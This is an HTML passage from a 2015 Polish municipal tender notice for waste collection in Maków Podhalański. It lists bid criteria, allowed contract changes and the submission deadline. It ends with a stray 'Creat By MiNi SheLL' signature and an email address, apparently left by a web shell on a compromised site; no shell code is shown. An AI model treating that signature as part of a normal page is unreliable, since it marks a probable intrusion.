<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, zgodnie z Rozdz. III pkt.9 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Koszt dzierżawy kontenerów - 10</li>
<li>3 - Koszt worków foliowych Typu LDPE - 10</li>
<li>4 - Serwis - czas wykonania dodatkowej zbiórki odpadów - 5</li>
<li>5 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Pzp. Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy z Wykonawcą w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących sytuacjach:
a.wynagrodzenie  umowne brutto może ulec odpowiedniej zmianie w przypadku zmiany powszechnie obowiązujących przepisów podatku VAT.
b.po zaktualizowaniu wykazu nieruchomości i mieszkańców dopuszczalna jest zmiana harmonogramu odbioru odpadów
c.zmiana terminu płatności, wynikająca z wszelkich zmian wprowadzonych przez strony do umowy.
d.w przypadku zmiany Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych, cena odbioru odpadów komunalnych będzie podlegała negocjacji w oparciu o cenę za km transportu odpadów, z zastrzeżeniem, że nie wzrośnie ona więcej niż 10% ceny 1t odpadu.
e.w innych uzasadnionych okolicznościach, których nie można było przewidzieć w chwili zawarcia umowy.
Zmiana postanowień umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.makow-podhalanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Makowie Podhalańskim 34-220 Maków Podhalański ul. Szpitalna 3 - Biuro Obsługi Klienta (Parter budynku)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2015 godzina 09:00, miejsce: Urząd Miejski w Makowie Podhalańskim 34-220 Maków Podhalański ul. Szpitalna 3 - Biuro Obsługi Klienta (Parter budynku)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com